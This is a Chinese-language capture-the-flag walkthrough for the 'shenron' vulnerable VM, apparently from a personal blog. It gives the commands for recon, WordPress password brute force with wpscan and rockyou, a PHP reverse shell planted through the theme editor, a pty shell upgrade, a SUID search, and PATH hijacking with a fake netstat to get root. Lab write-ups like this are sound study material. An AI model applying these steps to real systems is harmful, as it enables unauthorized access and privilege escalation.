环境准备
靶机链接:百度网盘 请输入提取码
提取码:ovsp
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机开放端口和服务
nmap -p- -A -T4 192.168.166.102
2.用gobuster扫描目录
gobuster dir -u http://192.168.1.102 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
漏洞利用
1.访问网页,发现网页加载不完整
2.用curl命令查看源码,发现域名
curl -i -L http://192.168.1.102
3.重新刷新页面,返回正常
4.用wpscan工具查用户名和密码
wpscan --url http://shenron/ -e u -P /usr/share/wordlists/rockyou.txt
5.用爆破出的用户名和密码登录
admin iloverockyou
6.把index.php源码改成php-reverse-shell.php(github里有),保存后,开启监听,访问页面,成功反弹shell
权限提升
1.python反弹交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
2.找了一通没找到可利用信息,而且我进不去shenron用户下,只能靠运气把唯一的密码输入进去试试。
成功进入shenron用户下,用find命令查到一个network
find / -perm -u=s -type f 2>/dev/null
3.查看network命令的特征,是一个查tcp,udp的命令;与netstat神似。
netstat -tupl 发现完全一样,那么network这个文件很有可能在调用netstat这个命令
4.我们新建一个netstat文件写入提权命令,让它替换network
chmod +x netstat
export PATH=/tmp:$PATH
5.提权成功,进入root目录,成功拿下!!!